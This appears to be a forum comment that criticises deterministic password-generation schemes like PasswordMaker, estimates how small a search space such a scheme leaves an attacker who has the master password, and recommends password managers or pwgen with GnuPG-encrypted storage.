    Despite what you claim, you’re really much better off using a secure storage app that creates truly random passwords for you and stores them in a securely encrypted file. In another post here I mention that I use 1Password, but really any reputable app will get you the same protections. Your algorithm is a “security by obscurity” system; if someone knows your algorithm, gaining your master password gives them full access to every account you have. Contrast with a password locker where you can change your master password before the attacker gets access to the secret store (which they may never be able to do if you’ve kept it secure!), and in the worst case scenario provides you with a list of accounts you need to change.

    I haven’t used PasswordMaker but I’d apply the same criticisms to them. If an attacker knows that you use PasswordMaker, they can narrow down the search space based on the very few things you can vary:

    • URL (the attacker will have this)
    • character set (dropdown gives you 6 choices)
    • which of nine hash algorithms was used (actually 13 — the FAQ is outdated)
    • modifier (algorithmically, part of your password)
    • username (attacker will have this or can likely guess it easily)
    • password length (let’s say, likely to be between 8 and 20 chars, so 13 options)
    • password prefix (stupid idea that reduces your password’s complexity)
    • password suffix (stupid idea that reduces your password’s complexity)
    • which of nine l33t-speak levels was used
    • when l33t-speak was applied (total of 28 options: 9 levels each at three different “Use l33t” times, plus “not at all”)

    My comments about the modifier being part of your password? Basically you’re concatenating those strings together to create a longer password in some manner. There’s not really a difference, and that’s assuming you actually use the modifier.

    So, back to our attack scenario where a hacker has your master password, username, and a URL they want to visit: disregarding the prefix and suffix options, they have 6 * 13 * 13 * 28 = 28,392 possible output passwords to test. That should keep them busy for at least a minute or two. And once they’ve guessed your combination, they can probably use the same settings on every other website you visit. Oh, and when you’ve found out that your password is compromised? Hope you remember every website you’ve ever used PasswordMaker on!

    Finally, if you’ve ever used the online version of PasswordMaker, even once, then you have to assume that your password is compromised. If their site has ever been compromised — and it’s hosted on a content delivery network with a lot of other websites — the attacker could easily have placed a script on the page to submit everything you type into the password generation form to a server in a distant country. Security demands that you have to assume this has happened.

    Seriously, please don’t do this stuff. I’d much rather see you using pwgen to create truly random passwords and then using something like GnuPG to store them all in a strongly-encrypted file.

    The summary version is this: use a password manager like 1Password to use a different hard-to-guess password on every website you visit. Don’t use some invented system to come up with passwords on your own because there’s a very poor chance that we mere mortals will get it right.